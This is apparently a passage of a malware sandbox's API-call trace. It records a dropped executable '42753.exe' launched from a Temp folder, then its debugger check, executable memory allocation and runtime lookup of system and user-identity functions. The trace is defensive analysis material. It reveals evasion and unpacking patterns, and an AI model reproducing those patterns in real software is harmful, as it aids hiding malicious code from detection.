0x0 [0047.598] SetEvent (hEvent=0x304) returned 1 [0047.598] GetLastError () returned 0x0 [0047.598] SetEvent (hEvent=0x334) returned 1 [0047.602] GetLastError () returned 0x0 [0047.603] CoUninitialize () Thread: id = 23 os_tid = 0xaa4 Thread: id = 24 os_tid = 0xaa8 Thread: id = 25 os_tid = 0xaac Thread: id = 26 os_tid = 0xab0 [0032.981] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0032.983] ResetEvent (hEvent=0x414) returned 1 [0032.983] GetLastError () returned 0x0 Thread: id = 27 os_tid = 0xacc [0047.485] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0047.491] ShellExecuteExW (in: pExecInfo=0x21c1b18*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe", lpParameters=0x0, lpDirectory="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x21c1b18*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe", lpParameters=0x0, lpDirectory="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x584)) returned 1 [0047.528] GetLastError () returned 0x0 [0047.528] CoGetContextToken (in: pToken=0x557fad8 | out: pToken=0x557fad8) returned 0x0 [0047.529] CoUninitialize () Thread: id = 29 os_tid = 0xad8 [0047.632] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0047.656] SetThreadUILanguage (LangId=0x0) returned 0x409 [0047.657] VirtualQuery (in: lpAddress=0x614dea0, lpBuffer=0x614eea0, dwLength=0x1c | out: lpBuffer=0x614eea0*(BaseAddress=0x614d000, AllocationBase=0x57c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0047.657] VirtualQuery (in: lpAddress=0x614dfbc, lpBuffer=0x614efbc, dwLength=0x1c | out: lpBuffer=0x614efbc*(BaseAddress=0x614d000, AllocationBase=0x57c0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0047.661] SetEvent (hEvent=0x40c) returned 1 [0047.662] GetLastError () returned 0x0 [0047.662] SetEvent (hEvent=0x400) returned 1 [0047.662] GetLastError () returned 0x0 [0047.662] SetEvent (hEvent=0x4f8) returned 1 [0047.662] GetLastError () returned 0x0 [0047.662] SetEvent (hEvent=0x40c) returned 1 [0047.662] GetLastError () returned 0x0 [0047.662] SetEvent (hEvent=0x400) returned 1 [0047.662] GetLastError () returned 0x0 [0047.662] SetEvent (hEvent=0x590) returned 1 [0047.662] GetLastError () returned 0x0 [0047.662] SetEvent (hEvent=0x420) returned 1 [0047.662] GetLastError () returned 0x0 [0047.662] SetEvent (hEvent=0x574) returned 1 [0047.662] GetLastError () returned 0x0 [0047.662] SetEvent (hEvent=0x58c) returned 1 [0047.662] GetLastError () returned 0x0 [0047.662] SetEvent (hEvent=0x594) returned 1 [0047.662] GetLastError () returned 0x0 [0047.751] CoUninitialize () Process: id = "3" image_name = "42753.exe" filename = "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\42753.exe" page_root = "0x7eef7360" os_pid = "0xad0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa68" cmd_line = "\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe\" " cur_dir = "C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 690 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 691 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 692 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 693 start_va = 0x400000 end_va = 0x419fff entry_point = 0x400000 region_type = mapped_file name = "42753.exe" filename = "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\42753.exe") Region: id = 694 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 695 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 696 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 697 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 698 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 699 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 700 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 701 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 702 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 703 start_va = 0x5f9f0000 end_va = 0x5fb92fff entry_point = 0x5f9f0000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 704 start_va = 0x6eb50000 end_va = 0x6ebd3fff entry_point = 0x6eb50000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 705 start_va = 0x70fc0000 end_va = 0x711fffff entry_point = 0x70fc66bd region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 706 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 707 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 708 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75742433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 709 start_va = 0x758a0000 end_va = 0x764e9fff entry_point = 0x75921601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 710 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x765049e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 711 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 712 start_va = 0x76670000 end_va = 0x766eafff entry_point = 0x76670000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll") Region: id = 713 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 714 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 715 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 716 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 717 start_va = 0x76b40000 end_va = 0x76b96fff entry_point = 0x76b59ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 718 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 719 start_va = 0x77140000 end_va = 0x7729bfff entry_point = 0x7718ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 720 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 722 start_va = 0x420000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 723 start_va = 0x773f0000 end_va = 0x773f4fff entry_point = 0x773f1438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 724 start_va = 0x4e0000 end_va = 0x5a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 725 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 726 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 727 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 728 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 729 start_va = 0x5b0000 end_va = 0x6b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 730 start_va = 0x6c0000 end_va = 0x12bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 731 start_va = 0x13b0000 end_va = 0x13bffff entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 732 start_va = 0x1c0000 end_va = 0x1d1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 733 start_va = 0x1e0000 end_va = 0x1ecfff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 734 start_va = 0x71a10000 end_va = 0x71a67fff entry_point = 0x71a113b4 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 735 start_va = 0x719c0000 end_va = 0x71a0efff entry_point = 0x719c1452 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 736 start_va = 0x76f00000 end_va = 0x77035fff entry_point = 0x76f01b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 737 start_va = 0x77040000 end_va = 0x77134fff entry_point = 0x77041865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 738 start_va = 0x76c60000 end_va = 0x76e5afff entry_point = 0x76c622d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 739 start_va = 0x76ba0000 end_va = 0x76c2efff entry_point = 0x76ba3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 740 start_va = 0x755b0000 end_va = 0x756ccfff entry_point = 0x755b158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 741 start_va = 0x75460000 end_va = 0x7546bfff entry_point = 0x7546238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 742 start_va = 0x75320000 end_va = 0x7533afff entry_point = 0x753293b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 743 start_va = 0x13c0000 end_va = 0x168efff entry_point = 0x13c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 744 start_va = 0x1f0000 end_va = 0x1fcfff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Thread: id = 28 os_tid = 0xad4 [0047.988] IsDebuggerPresent () returned 0 [0047.988] AreFileApisANSI () returned 1 [0047.988] SetFileApisToANSI () [0047.989] SetFileApisToOEM () [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.989] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.990] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.991] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0047.992] GetLastError () returned 0x0 [0048.002] MsiViewFetch (hView=0xb, phRecord=0x0) returned 0x57 [0048.003] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76890000 [0048.004] GetProcAddress (hModule=0x76890000, lpProcName="GetMessagePos") returned 0x768c6703 [0048.004] GetMessagePos () returned 0x0 [0048.010] JetBeginExternalBackup () returned 0xfffffc15 [0048.012] GetWindowsDirectoryA (in: lpBuffer=0x12fe48, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0048.012] lstrcatA (in: lpString1="C:\\Windows", lpString2="\\system32\\taskmgr.exe" | out: lpString1="C:\\Windows\\system32\\taskmgr.exe") returned="C:\\Windows\\system32\\taskmgr.exe" [0048.012] GetBinaryTypeA (in: lpApplicationName="C:\\Windows\\system32\\taskmgr.exe", lpBinaryType=0x12fe38 | out: lpBinaryType=0x12fe38) returned 1 [0048.020] GetProcAddress (hModule=0x76890000, lpProcName="GetCaretBlinkTime") returned 0x768a0d01 [0048.020] GetCaretBlinkTime () returned 0x212 [0048.020] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x12fbc4 | out: ProcedureAddress=0x12fbc4*=0x765e2fb6) returned 0x0 [0048.020] VirtualAlloc (lpAddress=0x0, dwSize=0x12000, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000 [0048.024] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x12fbe4 | out: ProcedureAddress=0x12fbe4*=0x765e2fb6) returned 0x0 [0048.024] VirtualAlloc (lpAddress=0x0, dwSize=0xd000, flAllocationType=0x1000, flProtect=0x40) returned 0x1e0000 [0048.025] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="LoadLibraryA", Ordinal=0x0, ProcedureAddress=0x12fc28 | out: ProcedureAddress=0x12fc28*=0x765e395c) returned 0x0 [0048.025] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="GetProcAddress", Ordinal=0x0, ProcedureAddress=0x12fc28 | out: ProcedureAddress=0x12fc28*=0x765e33d3) returned 0x0 [0048.025] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x12fc28 | out: ProcedureAddress=0x12fc28*=0x765e2fb6) returned 0x0 [0048.025] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualProtect", Ordinal=0x0, ProcedureAddress=0x12fc28 | out: ProcedureAddress=0x12fc28*=0x765d2341) returned 0x0 [0048.025] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="UnmapViewOfFile", Ordinal=0x0, ProcedureAddress=0x12fc28 | out: ProcedureAddress=0x12fc28*=0x765ddb13) returned 0x0 [0048.025] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="AddVectoredExceptionHandler", Ordinal=0x0, ProcedureAddress=0x12fc28 | out: ProcedureAddress=0x12fc28*=0x772af774) returned 0x0 [0048.025] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="RemoveVectoredExceptionHandler", Ordinal=0x0, ProcedureAddress=0x12fc28 | out: ProcedureAddress=0x12fc28*=0x7731ad2e) returned 0x0 [0048.025] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x764f0000 [0048.026] GetProcAddress (hModule=0x764f0000, lpProcName="GetUserNameA") returned 0x7651a4b4 [0048.026] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76590000 [0048.026] GetProcAddress (hModule=0x76590000, lpProcName="CreateFileA") returned 0x765dcee8 [0048.026] GetProcAddress (hModule=0x76590000, lpProcName="CloseHandle") returned 0x765dca7c [0048.026] GetProcAddress (hModule=0x76590000, lpProcName="GetModuleHandleA") returned 0x765dcf41 [0048.026] GetProcAddress (hModule=0x76590000, lpProcName="GetModuleFileNameA") returned 0x765e33f6 [0048.026] GetProcAddress (hModule=0x76590000, lpProcName="GetComputerNameA") returned 0x765c6ba9 [0048.026] GetProcAddress (hModule=0x76590000, lpProcName="GetComputerNameExA") returned 0x7661f41f [0048.026] GetProcAddress (hModule=0x76590000, lpProcName="lstrcmpA") returned 0x765c8c59 [0048.026] GetProcAddress (hModule=0x76590000, lpProcName="FreeConsole") returned 0x7663bfde [0048.026] GetProcAddress (hModule=0x76590000, lpProcName="VirtualAlloc") returned 0x765e2fb6 [0048.026] GetProcAddress (hModule=0x76590000, lpProcName="IsDebuggerPresent") returned 0x765d3ea8 [0048.026] GetProcAddress (hModule=0x76590000, lpProcName="GetCommandLineA") returned 0x765e98ff [0048.026] GetProcAddress (hModule=0x76590000, lpProcName="LoadLibraryA") returned 0x765e395c [0048.026] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x772a0000 [0048.026] GetProcAddress (hModule=0x772a0000, lpProcName="cos") returned 0x772e7400 [0048.026] GetProcAddress (hModule=0x772a0000, lpProcName="sin") returned 0x772d41c0 [0048.026] GetProcAddress (hModule=0x772a0000, lpProcName="strchr") returned 0x772e7690 [0048.026] LoadLibraryA 